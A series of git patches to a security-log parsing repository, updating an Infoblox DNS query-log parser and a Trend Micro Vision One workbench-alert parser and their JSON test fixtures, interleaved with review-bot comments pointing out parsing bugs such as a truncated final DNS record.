@@ -143,9 +143,33 @@ stages:
 {% if parse_event.message.flags_rd == "+" %}"RD",{% endif %}
 {% if parse_event.message.flags_cd == "C" %}"CD",{% endif %}
 ]
+
 - set:
- network.transport: "tcp"
- filter: '{{parse_event.message.flags_tcp == "T"}}'
+ dns.type: query
+ filter: '{{parse_event.message.get("response_code") == None}}'
+ - set:
+ dns.type: answer
+ dns.response_code: '{{parse_event.message.response_code}}'
+ filter: '{{parse_event.message.get("response_code") != None}}'
+
+ - set:
+ dns.answers: |
+ [
+ {%- for record in parse_event.message.dns_records.split() | batch(5) -%}
+ {"name": "{{record[0]}}", "ttl": {{record[1]}}, "class": "{{record[2]}}", "type": "{{record[3]}}", "data": "{{record[4][:-1]}}"},
+ {%- endfor -%}
+ ]
+ filter: '{{parse_event.message.get(''dns_records'') != None}}'
+
+ - set:
+ network.transport: tcp
+ filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp == "T"}}'
+ - set:
+ network.transport: udp
+ filter: '{{parse_event.message.get("flags_tcp") != None and parse_event.message.flags_tcp != "T"}}'
+ - set:
+ network.transport: '{{parse_event.message.network_transport | lower }}'
+ filter: '{{parse_event.message.get("network_transport") != None}}'
 - set:
 infoblox.ddi.category: "{{parse_event.message.infoblox_nios_log_dns_category}}"
diff --git a/Infoblox/ddi/tests/query_log_dns_2.json b/Infoblox/ddi/tests/query_log_dns_2.json
index 44cae19f4..1d4135768 100644
--- a/Infoblox/ddi/tests/query_log_dns_2.json
+++ b/Infoblox/ddi/tests/query_log_dns_2.json
@@ -16,6 +16,9 @@
 "response_code": "NXDOMAIN",
 "type": "query"
 },
+ "network": {
+ "transport": "udp"
+ },
 "related": {
 "hosts": [
 "test.io"
diff --git a/Infoblox/ddi/tests/query_log_dns_3.json b/Infoblox/ddi/tests/query_log_dns_3.json
index 6b742fbb7..959a20d36 100644
--- a/Infoblox/ddi/tests/query_log_dns_3.json
+++ b/Infoblox/ddi/tests/query_log_dns_3.json
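Review bot: The `dns.type: answer` / `dns.response_code` stage keys on `parse_event.message.response_code`, but the DNS_8–DNS_13 patterns in the earlier hunk capture the code as `dns_response_code`, so unless a stage outside this hunk copies it the `answer` branch never fires and every response line keeps `dns.type: query` — which is exactly what all the fixtures in this commit expect, so the tests are pinning the bug. The three lines should read `filter: '{{parse_event.message.get("dns_response_code") == None}}'`, `dns.response_code: '{{parse_event.message.dns_response_code}}'` and `filter: '{{parse_event.message.get("dns_response_code") != None}}'`. In the `dns.answers` template, `record[4][:-1]` drops the last character of each record's data on the assumption of a trailing `;`, but the final record of a message carries none and is truncated — the fixtures encode this (`"192.168.1."` in query_log_dns_6.json, `"test.test.io"` without its trailing dot in query_log_dns_5.json); `record[4].rstrip(';')` keeps the data intact. The record fields are also interpolated into the JSON literal unescaped, so answer data containing quotes or whitespace (TXT records, for instance) would break the JSON or the `batch(5)` grouping; rendering each field through Jinja's `| tojson` would at least keep the document parseable, and a final batch shorter than five tokens should be skipped rather than indexed.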
@@ -16,6 +16,9 @@
 "response_code": "NXDOMAIN",
 "type": "query"
 },
+ "network": {
+ "transport": "udp"
+ },
 "related": {
 "hosts": [
 "test.org"
diff --git a/Infoblox/ddi/tests/query_log_dns_4.json b/Infoblox/ddi/tests/query_log_dns_4.json
index 4806d5bab..e52e2b96b 100644
--- a/Infoblox/ddi/tests/query_log_dns_4.json
+++ b/Infoblox/ddi/tests/query_log_dns_4.json
@@ -17,6 +17,9 @@
 "response_code": "NXDOMAIN",
 "type": "query"
 },
+ "network": {
+ "transport": "udp"
+ },
 "related": {
 "hosts": [
 "_ldap._tcp.test.test.net"
diff --git a/Infoblox/ddi/tests/query_log_dns_5.json b/Infoblox/ddi/tests/query_log_dns_5.json
index bd240d9a7..126d59135 100644
--- a/Infoblox/ddi/tests/query_log_dns_5.json
+++ b/Infoblox/ddi/tests/query_log_dns_5.json
@@ -5,6 +5,15 @@
 "expected": {
 "message": "client 192.168.1.1#37521: UDP: query: test.test.io IN AAAA response: NOERROR +A test.test.io. 86400 IN CNAME test.test.io.",
 "dns": {
+ "answers": [
+ {
+ "class": "IN",
+ "data": "test.test.io",
+ "name": "test.test.io.",
+ "ttl": 86400,
+ "type": "CNAME"
+ }
+ ],
 "header_flags": [],
 "question": {
 "class": "IN",
@@ -17,6 +26,9 @@
 "response_code": "NOERROR",
 "type": "query"
 },
+ "network": {
+ "transport": "udp"
+ },
 "related": {
 "hosts": [
 "test.test.io"
diff --git a/Infoblox/ddi/tests/query_log_dns_6.json b/Infoblox/ddi/tests/query_log_dns_6.json
index 1129be865..606b02ef2 100644
--- a/Infoblox/ddi/tests/query_log_dns_6.json
+++ b/Infoblox/ddi/tests/query_log_dns_6.json
@@ -5,6 +5,50 @@
 "expected": {
 "message": "client 192.168.1.1#40432: UDP: query: test.test.org IN A response: NOERROR + test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1; test.test.org. 365 IN A 192.168.1.1",
 "dns": {
+ "answers": [
+ {
+ "class": "IN",
+ "data": "192.168.1.1",
+ "name": "test.test.org.",
+ "ttl": 365,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "192.168.1.1",
+ "name": "test.test.org.",
+ "ttl": 365,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "192.168.1.1",
+ "name": "test.test.org.",
+ "ttl": 365,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "192.168.1.1",
+ "name": "test.test.org.",
+ "ttl": 365,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "192.168.1.1",
+ "name": "test.test.org.",
+ "ttl": 365,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "192.168.1.",
+ "name": "test.test.org.",
+ "ttl": 365,
+ "type": "A"
+ }
+ ],
 "header_flags": [],
 "question": {
 "class": "IN",
@@ -17,6 +61,9 @@
 "response_code": "NOERROR",
 "type": "query"
 },
+ "network": {
+ "transport": "udp"
+ },
 "related": {
 "hosts": [
 "test.test.org"
diff --git a/Infoblox/ddi/tests/query_log_dns_7.json b/Infoblox/ddi/tests/query_log_dns_7.json
index b695d7a1a..ca3673036 100644
--- a/Infoblox/ddi/tests/query_log_dns_7.json
+++ b/Infoblox/ddi/tests/query_log_dns_7.json
@@ -16,6 +16,9 @@
 "response_code": "NOERROR",
 "type": "query"
 },
+ "network": {
+ "transport": "udp"
+ },
 "related": {
 "hosts": [
 "test.dev"
diff --git a/Infoblox/ddi/tests/query_log_dns_8.json b/Infoblox/ddi/tests/query_log_dns_8.json
index 2204069d9..72f737796 100644
--- a/Infoblox/ddi/tests/query_log_dns_8.json
+++ b/Infoblox/ddi/tests/query_log_dns_8.json
@@ -6,6 +6,15 @@
 "message": "28-Nov-2024 15:26:27.498 client 1.2.3.4#36615: UDP: query: PD2LORA2.enim.l2 IN A response: NOERROR +A test.dev. 3600 IN A 10.56.12.201;",
 "@timestamp": "2024-11-28T15:26:27.498000Z",
 "dns": {
+ "answers": [
+ {
+ "class": "IN",
+ "data": "10.56.12.201",
+ "name": "test.dev.",
+ "ttl": 3600,
+ "type": "A"
+ }
+ ],
 "header_flags": [],
 "question": {
 "class": "IN",
@@ -16,6 +25,9 @@
 "response_code": "NOERROR",
 "type": "query"
 },
+ "network": {
+ "transport": "udp"
+ },
 "related": {
 "hosts": [
 "PD2LORA2.enim.l2"
diff --git a/Infoblox/ddi/tests/query_log_dns_9.json b/Infoblox/ddi/tests/query_log_dns_9.json
index f4a0e6e07..ae3c85ca0 100644
--- a/Infoblox/ddi/tests/query_log_dns_9.json
+++ b/Infoblox/ddi/tests/query_log_dns_9.json
@@ -6,6 +6,92 @@
 "message": "28-Nov-2024 15:26:27.359 client 1.2.3.4#63175: UDP: query: www.bing.com IN A response: NOERROR + www.bing.com. 7072 IN CNAME www-www.bing.com.trafficmanager.net.; www-www.bing.com.trafficmanager.net. 56 IN CNAME www.bing.com.edgekey.net.; www.bing.com.edgekey.net. 7154 IN CNAME e86303.test.xxxxx.net.; e86303.test.xxxxx.net. 17 IN A 1.2.3.181; e86303.test.xxxxx.net. 17 IN A 1.2.3.173; e86303.test.xxxxx.net. 17 IN A 1.2.3.184; e86303.test.xxxxx.net. 17 IN A 1.2.3.185; e86303.test.xxxxx.net. 17 IN A 1.2.3.174; e86303.test.xxxxx.net. 17 IN A 1.2.3.183; e86303.test.xxxxx.net. 17 IN A 1.2.3.177; e86303.test.xxxxx.net. 17 IN A 1.2.3.179; e86303.test.xxxxx.net. 17 IN A 1.2.3.175;",
 "@timestamp": "2024-11-28T15:26:27.359000Z",
 "dns": {
+ "answers": [
+ {
+ "class": "IN",
+ "data": "www-www.bing.com.trafficmanager.net.",
+ "name": "www.bing.com.",
+ "ttl": 7072,
+ "type": "CNAME"
+ },
+ {
+ "class": "IN",
+ "data": "www.bing.com.edgekey.net.",
+ "name": "www-www.bing.com.trafficmanager.net.",
+ "ttl": 56,
+ "type": "CNAME"
+ },
+ {
+ "class": "IN",
+ "data": "e86303.test.xxxxx.net.",
+ "name": "www.bing.com.edgekey.net.",
+ "ttl": 7154,
+ "type": "CNAME"
+ },
+ {
+ "class": "IN",
+ "data": "1.2.3.181",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "1.2.3.173",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "1.2.3.184",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "1.2.3.185",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "1.2.3.174",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "1.2.3.183",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "1.2.3.177",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ },
+ {
+ "class": 
"IN",
+ "data": "1.2.3.179",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ },
+ {
+ "class": "IN",
+ "data": "1.2.3.175",
+ "name": "e86303.test.xxxxx.net.",
+ "ttl": 17,
+ "type": "A"
+ }
+ ],
 "header_flags": [],
 "question": {
 "class": "IN",
@@ -18,6 +104,9 @@
 "response_code": "NOERROR",
 "type": "query"
 },
+ "network": {
+ "transport": "udp"
+ },
 "related": {
 "hosts": [
 "www.bing.com"
From a71e4ec1bc766f78582c816d8633d8b733aa7790 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Mon, 2 Dec 2024 09:54:25 +0100
Subject: [PATCH 112/150] fix(TrendMicroVisionOne): add action result
---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml | 1 +
 .../tests/test_eicar_test_file_detection.json | 1 +
 2 files changed, 2 insertions(+)
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 0353bb37b..988fe612e 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
@@ -37,6 +37,7 @@ stages:
 rule.id: "{{parsed_event.message.model.modelId}}"
 event.url: "{{parsed_event.message.model.workbenchLink}}"
+ event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
 - set:
 user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}"
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
index 5fb30866d..e503353f1 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
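Review bot: `event.action` takes `| first` of the indicators filtered on `field == 'actResult'`; when an alert carries no such indicator, `first` of an empty sequence yields an undefined value and `.value` on it either raises or renders an empty string depending on the template's undefined handling, so an alert without an action result could fail the whole set stage or emit an empty `event.action`. The existing `user.id` line uses the same pattern, so the exposure is not new, but a guard keeps the field out of the event instead: move it to its own stage `- set:` / `event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"` / `filter: "{{ (parsed_event.message.indicators | default([]) | selectattr('field', '==', 'actResult') | list | length) > 0 }}"`. The `- set:` block containing this line starts outside the hunk.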
@@ -5,6 +5,7 @@ "expected": { "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", 
\"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", "event": { + "action": "File quarantined", "category": [ "intrusion_detection" ], From 776dc1e17b4fd4090e082ba91cd775faf9b86f8e Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc
Date: Mon, 2 Dec 2024 09:55:43 +0100
Subject: [PATCH 113/150] fix(TrendMicroVisionOne): fix workbench alert url
---
 Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 +-
 .../tests/test_eicar_test_file_detection.json | 3 ++-
 .../tests/test_information_gathering.json | 3 ++-
 .../tests/test_internal_network_scanner.json | 3 ++-
 Trend Micro/trend-micro-vision-one/tests/test_process.json | 3 ++-
 .../trend-micro-vision-one/tests/test_project_injection.json | 3 ++-
 Trend Micro/trend-micro-vision-one/tests/test_registry.json | 3 ++-
 .../trend-micro-vision-one/tests/test_service_abuse.json | 3 ++-
 8 files changed, 15 insertions(+), 8 deletions(-)
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 988fe612e..d672e2a64 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
@@ -36,7 +36,7 @@ stages:
 rule.name: "{{parsed_event.message.model}}"
 rule.id: "{{parsed_event.message.model.modelId}}"
- event.url: "{{parsed_event.message.model.workbenchLink}}"
+ event.url: "{{parsed_event.message.workbenchLink}}"
 event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
 - set:
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
index e503353f1..53813871b 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
@@ -13,7 +13,8 @@
 "reason": "Eicar Test File Detection",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:51:29Z",
 "file": {
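Review bot: The context line `rule.id: "{{parsed_event.message.model.modelId}}"` just above the fix has the same defect as the line being fixed: in the eicar fixture `model` is the alert's name string (`"model": "Eicar Test File Detection"`) and `modelId` is a top-level key, so `.model.modelId` cannot resolve and `rule.id` is left empty (or raises, depending on the template's undefined handling). It should become `rule.id: "{{parsed_event.message.modelId}}"`, with the fixtures asserting the expected `rule.id` so the regression is covered. The `- set:` block starts outside the hunk.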
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
index 4d60422b4..edbe26be4 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
@@ -12,7 +12,8 @@
 "reason": "Potential Information Gathering",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:48:06Z",
 "host": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index 5b8dbfc95..d15f28c6f 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
@@ -12,7 +12,8 @@
 "reason": "Internal Network Scanner",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509"
 },
 "@timestamp": "2024-07-23T14:46:11Z",
 "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 9a41ea92c..3c77d1afd 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json
@@ -12,7 +12,8 @@
 "reason": "Credential Dumping via Mimikatz",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://THE_WORKBENCH_URL"
 },
 "@timestamp": "2022-09-06T02:49:30Z",
 "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
index dbeed8e8e..a95ac7fc8 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
@@ -12,7 +12,8 @@
 "reason": "Process Injection from Windows Temporary Location to System32",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3"
 },
 "@timestamp": "2024-07-23T07:49:48Z",
 "host": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 61b294270..6598afe24 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
@@ -12,7 +12,8 @@
 "reason": "Privilege Escalation via UAC Bypass",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://THE_WORKBENCH_URL"
 },
 "@timestamp": "2022-09-06T02:49:31Z",
 "container": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
index e3283fe41..a9a7d3d7c 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
@@ -12,7 +12,8 @@
 "reason": "Possible Web Service Abuse",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:45:28Z",
 "action": {
From f27eab62f8c6c3b3437d951d4e9608aef80ffa05 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Mon, 2 Dec 2024 10:00:00 +0100
Subject: [PATCH 114/150] refactor(TrendMicro): change the name of the format
---
 .../CHANGELOG.md | 0
 .../_meta/fields.yml | 0
 .../_meta/logo.png | Bin
 .../_meta/manifest.yml | 5 +++--
 .../_meta/smart-descriptions.json | 0
 .../ingest/parser.yml | 2 +-
 .../tests/test_eicar_test_file_detection.json | 0
 .../tests/test_information_gathering.json | 0
 .../tests/test_internal_network_scanner.json | 0
 .../tests/test_process.json | 0
 .../tests/test_project_injection.json | 0
 .../tests/test_registry.json | 0
 .../tests/test_service_abuse.json | 0
 13 files changed, 4 insertions(+), 3 deletions(-)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/CHANGELOG.md (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/fields.yml (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/logo.png (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/manifest.yml (73%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/smart-descriptions.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/ingest/parser.yml (99%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_eicar_test_file_detection.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_information_gathering.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_internal_network_scanner.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_process.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_project_injection.json (100%)
 rename Trend Micro/{trend-micro-vision-one => 
trend-micro-vision-one-workbench}/tests/test_registry.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_service_abuse.json (100%)
diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/CHANGELOG.md
rename to Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md
diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/fields.yml
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml
diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/logo.png
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png
diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
similarity index 73%
rename from Trend Micro/trend-micro-vision-one/_meta/manifest.yml
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
index da8360194..014352012 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml
+++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
@@ -1,11 +1,12 @@
 uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e
 automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05
 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6
-name: Trend Micro Vision One [BETA]
-slug: trend-micro-vision-one
+name: Trend Micro Vision One Workbench Alerts [BETA]
+slug: trend-micro-vision-one-workbench-alerts
 description: >-
 Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation.
+ This intake format will ingest Workbench Alerts from Trend Micro Vision One.
 data_sources:
 Process monitoring:
diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
similarity index 99%
rename from Trend Micro/trend-micro-vision-one/ingest/parser.yml
rename to Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
index d672e2a64..f5859582b 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
@@ -1,4 +1,4 @@
-name: trend-micro-vision-one
+name: trend-micro-vision-one-workbench
 ignored_values: []
 pipeline:
 - name: parsed_event
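Review bot: The manifest's new `slug: trend-micro-vision-one-workbench-alerts` no longer matches the parser's new `name: trend-micro-vision-one-workbench` in the parser.yml hunk below, nor the renamed directory `trend-micro-vision-one-workbench`, whereas before this commit all three were `trend-micro-vision-one`. If the intake tooling correlates manifest slug, parser name and directory, one side should be aligned — either drop the `-alerts` suffix from the slug or carry it through to the parser name and directory. If they are intentionally independent, a one-line comment above `slug:` saying so would spare the next reader the same question.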
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_process.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
